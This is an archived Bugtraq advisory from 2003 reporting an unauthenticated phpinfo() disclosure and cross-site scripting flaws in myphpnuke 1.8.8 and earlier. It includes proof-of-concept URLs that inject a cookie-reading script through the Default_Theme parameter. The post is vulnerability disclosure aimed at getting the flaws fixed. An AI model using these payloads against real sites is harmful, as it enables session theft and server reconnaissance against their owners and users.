Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

phpmynuke css and phpinfo() vuls
From: "Mindwarper" <logger () hehe com>
Date: Sun, 5 Jan 2003 05:29:59 -0600
myphpnuke version 1.8.8_final_7 and prior that contain sysinfo are
vulnerable to both css attack and phpinfo() Disclosure. The problem is that
unlike the rest of the scripts under /admin/, sysinfo's footer script
called system_footer.php does not check who the user is. 
Inside system_footer.php the following code is run:
echo "<br>";
 phpinfo();
 echo "<br>";

Thus showing any remote user sensitive data about the server.

-

Another problem in myphpnuke is the unchecked template includes.

Examples:

http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>aler
t(document.cookie);</script>

http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>a
lert(document.cookie);</script>

...and a couple more of these exist.

- Mindwarper
-- logger () hehe com

_____________________________________________
Free email with personality! Over 200 domains!
http://www.MyOwnEmail.com
Looking for friendships,romance and more?
http://www.MyOwnFriends.com

  By Date           By Thread  

Current thread:
  • phpmynuke css and phpinfo() vuls Mindwarper (Jan 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]